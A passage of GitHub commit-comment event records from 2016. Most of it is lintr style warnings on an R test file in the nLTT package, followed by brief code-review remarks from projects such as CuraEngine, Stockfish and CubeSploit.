*style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:46:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:60:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:46:62:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **lines should not be more than 80 characters.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:57:17:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:23:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:27:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                          ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:39:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:45:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                            ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:62:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                             ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:68:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:74:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:82:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:57:85:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                    ^\n```\n[tests/testthat/test_mcmc_nltt.R:57:90:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **lines should not be more than 80 characters.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:62:18:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                 ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:24:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:28:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:34:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                 ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:41:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:47:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:57:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                       ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:64:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:70:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                    ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:76:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:84:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:62:87:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:62:92:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    mcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **lines should not be more than 80 characters.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:67:22:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                     ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:28:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:36:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:43:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                          ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:59:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:66:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                 ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:72:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                      ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:78:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                             ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:86:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                    ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:67:89:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Commas should always have a space after.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:67:94:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​    v <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n                                                                                            ~^~\n```"}},"created_at":"2016-09-14T11:30:02Z"}
{"id":"4561378190","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017300,"position":5,"line":24,"path":"global.gd","commit_id":"2bbd4c20432ba1a2a2b09d85e98dc84180271a72","created_at":"2016-09-14T11:30:25Z","updated_at":"2016-09-14T11:30:25Z","body":"Also, if you follow the suggestion below, this should be a const"}},"created_at":"2016-09-14T11:30:25Z"}
{"id":"4561379225","type":"CommitCommentEvent","actor":{"login":"koppor"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":19017306,"position":null,"line":null,"path":null,"commit_id":"d10fbbe9cdbb226da6bf6b752b3a6c6de95cf748","created_at":"2016-09-14T11:30:39Z","updated_at":"2016-09-14T11:30:39Z","body":"Thank you :+1:"}},"created_at":"2016-09-14T11:30:39Z"}
{"id":"4561380328","type":"CommitCommentEvent","actor":{"login":"Rangoxl"},"repo":{"name":"Rangoxl/ggizitutorial"},"payload":{"comment":{"id":19017309,"position":1,"line":1,"path":".gitignore","commit_id":"cadb2bf758846ee24b49b23b442ad61937a645fb","created_at":"2016-09-14T11:30:55Z","updated_at":"2016-09-14T11:30:55Z","body":" hola\r\n"}},"created_at":"2016-09-14T11:30:55Z"}
{"id":"4561380826","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017311,"position":10,"line":42,"path":"src/utils/LinearAlg2D.cpp","commit_id":"347f5c623810c92a37cd0bfb83d2db3647d67430","created_at":"2016-09-14T11:31:03Z","updated_at":"2016-09-14T11:31:03Z","body":"Typo: `01` instead of `1`. Fixed this for you in 2050e71ddaa96a08fbe6f1a0ae87ae5275b86d25."}},"created_at":"2016-09-14T11:31:03Z"}
{"id":"4561381588","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017313,"position":8,"line":8,"path":"world/body/quad.gd","commit_id":"5e0303cface65de2b8fb9fab02e9fea235fbbb4e","created_at":"2016-09-14T11:31:14Z","updated_at":"2016-09-14T11:31:14Z","body":"You can put default values here, just so that types are obvious :wink: "}},"created_at":"2016-09-14T11:31:14Z"}
{"id":"4561382029","type":"CommitCommentEvent","actor":{"login":"Ullas9"},"repo":{"name":"ryanfowler/uuid"},"payload":{"comment":{"id":19017314,"position":null,"line":null,"path":null,"commit_id":"4d3cbaf931536de80f33710f6ebba5c83f762345","created_at":"2016-09-14T11:31:20Z","updated_at":"2016-09-14T11:31:20Z","body":"hey swift 3 is not allowing to integrate sqllite kindly reply on ullasrs2002@yahoo.co.in"}},"created_at":"2016-09-14T11:31:20Z"}
{"id":"4561382700","type":"CommitCommentEvent","actor":{"login":"hitarujung"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19017316,"position":null,"line":null,"path":null,"commit_id":"a0257709ae5edb6d58e72c2b3125a60f55805ff3","created_at":"2016-09-14T11:31:28Z","updated_at":"2016-09-14T11:31:28Z","body":"Thank You"}},"created_at":"2016-09-14T11:31:28Z"}
{"id":"4561385295","type":"CommitCommentEvent","actor":{"login":"stundzig"},"repo":{"name":"Polymap4/polymap4-p4"},"payload":{"comment":{"id":19017323,"position":null,"line":null,"path":null,"commit_id":"e1fc1ebda14268d4061131ebb201cd62ea44c6d2","created_at":"2016-09-14T11:32:04Z","updated_at":"2016-09-14T11:32:04Z","body":"oh shit, das wollte ich nicht committen, mist"}},"created_at":"2016-09-14T11:32:04Z"}
{"id":"4561390716","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19017343,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T11:33:21Z","updated_at":"2016-09-14T11:33:21Z","body":"@snicolet @mcostalba We have SEE calls on illegal moves (pos.checkers() && !pos.legal(move)) in search at step 12 (extend checks) and in qsearch when evasionPrunable is true. \r\nWhile I think that the latter is no problem (it's totally ok to prune illegal moves), I think the first may represent a bug. opinions?"}},"created_at":"2016-09-14T11:33:21Z"}
{"id":"4561391626","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017347,"position":null,"line":null,"path":null,"commit_id":"c734e0528be884ae1de6667cf7041c3e7a3d5aa5","created_at":"2016-09-14T11:33:33Z","updated_at":"2016-09-14T11:33:33Z","body":"Ah, it is called just class in English, no `e` at the end :smile: "}},"created_at":"2016-09-14T11:33:33Z"}
{"id":"4561393812","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017351,"position":9,"line":258,"path":"src/utils/linearAlg2D.h","commit_id":"acf26ba2f8e872735341c6a1c9cc219974bbeba0","created_at":"2016-09-14T11:34:06Z","updated_at":"2016-09-14T11:34:06Z","body":"Typo in numerical literal. Fixed this for you in 9da278795fcd01b26c80b30e23717ac20248507a."}},"created_at":"2016-09-14T11:34:06Z"}
{"id":"4561398240","type":"CommitCommentEvent","actor":{"login":"stundzig"},"repo":{"name":"Polymap4/polymap4-p4"},"payload":{"comment":{"id":19017362,"position":75,"line":183,"path":"org.polymap.p4/src/org/polymap/p4/layer/LayersPanel.java","commit_id":"e1fc1ebda14268d4061131ebb201cd62ea44c6d2","created_at":"2016-09-14T11:35:10Z","updated_at":"2016-09-14T11:35:10Z","body":"Da weiss ich nicht wie ich das testen kann. Ich bin schon froh überhaupt die Variante mit dem localStore gefunden zu haben. Gibts ne andere Möglichkeit über MetaData-Abfrage oderso?\r\n\r\nIm LayersPanel hab ich ja das gleiche Problem."}},"created_at":"2016-09-14T11:35:10Z"}
{"id":"4561398595","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017364,"position":15,"line":15,"path":"world/body/chunk.gd","commit_id":"c734e0528be884ae1de6667cf7041c3e7a3d5aa5","created_at":"2016-09-14T11:35:15Z","updated_at":"2016-09-14T11:35:15Z","body":"Why not just make it `extends MeshInstance`? That way position + add_child stuff would be managed by the parent.\r\n\r\nObviously, this doesn't apply to the C++ code, since it might be smarter :smile: "}},"created_at":"2016-09-14T11:35:15Z"}
{"id":"4561400835","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017368,"position":9,"line":9,"path":"global.gd","commit_id":"7b36cf26e2143456ec19ff3e7a728a8d79ff4129","created_at":"2016-09-14T11:35:47Z","updated_at":"2016-09-14T11:35:47Z","body":"preload again."}},"created_at":"2016-09-14T11:35:47Z"}
{"id":"4561410472","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19017396,"position":null,"line":null,"path":null,"commit_id":"c1070935819eaeaafce99c6cdf1340b6fc090417","created_at":"2016-09-14T11:38:12Z","updated_at":"2016-09-14T11:38:12Z","body":"wtf"}},"created_at":"2016-09-14T11:38:12Z"}
{"id":"4561415746","type":"CommitCommentEvent","actor":{"login":"olegendo"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19017416,"position":null,"line":null,"path":null,"commit_id":"c80f934150e34da4544cc9bc1e223d5a238d775a","created_at":"2016-09-14T11:39:29Z","updated_at":"2016-09-14T11:39:29Z","body":"Yes, sorry for the noise."}},"created_at":"2016-09-14T11:39:29Z"}
{"id":"4561416082","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19017417,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-14T11:39:34Z","updated_at":"2016-09-14T11:39:34Z","body":"I wanna to ask, does gralloc opensource work normally on Android 5.0+? I'm asking because for us (codina users) using opensource gralloc causes screen tearings (this is quite noticeable in settings app when you scrolling it). \r\nP.s. are new RIL sources works just without any modifications ? o_O I remember that when I was trying to use CM sources it just ended up with RIL not to work at all (though, I don't remember if I was trying it since the patch for disabling ashmem tracking was found by CM).\r\nFor MTP, you can try patch https://github.com/ChronoMonochrome/android_device_samsung_codina/blob/cm-13.0/patches/packages/providers/MediaProvider/packages-providers-MediaProvider_W000-activate-MTP.patch - don't know if this is relevant for your case, but we had problems with MTP in early CM13 builds as well.\r\nI've also remembered something about GPS - @Epirex has recently got GPS working on janice, and as I can judge, codinalte GPS implementation is more close to janice, than to codina one (missing gpsd binary, included sirfgps.conf etc) :  https://github.com/TheMuppets/proprietary_vendor_samsung/commit/b4d64d49eb0709e2edc8efd835b130cf37cf60f4\r\nI don't know about all details how exactly AndroidGetTid has got replaced with gettid function (since the length of these two functions differs, it's not very obvious to me).\r\nActually there is one more thing I wanted to ask. If have some time, can you test if a2dp is working properly on Android 5.1+? The problem we facing is that, when someone listening to the music via a2dp and disabling the screen, it just puts the phone to a sleep thus causing a2dp to stop working."}},"created_at":"2016-09-14T11:39:34Z"}
{"id":"4561419889","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017429,"position":7,"line":253,"path":"src/utils/polygon.h","commit_id":"72e4bf8069f50ab8b4e11552d5eac29424bfda88","created_at":"2016-09-14T11:40:26Z","updated_at":"2016-09-14T11:40:26Z","body":"Maximum, not maximal. Fixed this for you in 8fd5c6d4042ed8b1d11b63921151e98174a96e50."}},"created_at":"2016-09-14T11:40:26Z"}
{"id":"4561432801","type":"CommitCommentEvent","actor":{"login":"Seldaek"},"repo":{"name":"Seldaek/signal-handler"},"payload":{"comment":{"id":19017449,"position":null,"line":null,"path":null,"commit_id":"42c3274aa533dbc7315943de66bead42b7b85476","created_at":"2016-09-14T11:43:31Z","updated_at":"2016-09-14T11:43:31Z","body":"As per https://wiki.php.net/rfc/async_signals it seems to just be perf yeah"}},"created_at":"2016-09-14T11:43:31Z"}
{"id":"4561444461","type":"CommitCommentEvent","actor":{"login":"sgtoj"},"repo":{"name":"sgtoj/PSConnectWise"},"payload":{"comment":{"id":19017476,"position":null,"line":null,"path":null,"commit_id":"9205db0691d60ef538c0caf81a3f07cfbb6eb648","created_at":"2016-09-14T11:46:22Z","updated_at":"2016-09-14T11:46:22Z","body":"fixes #27 "}},"created_at":"2016-09-14T11:46:22Z"}
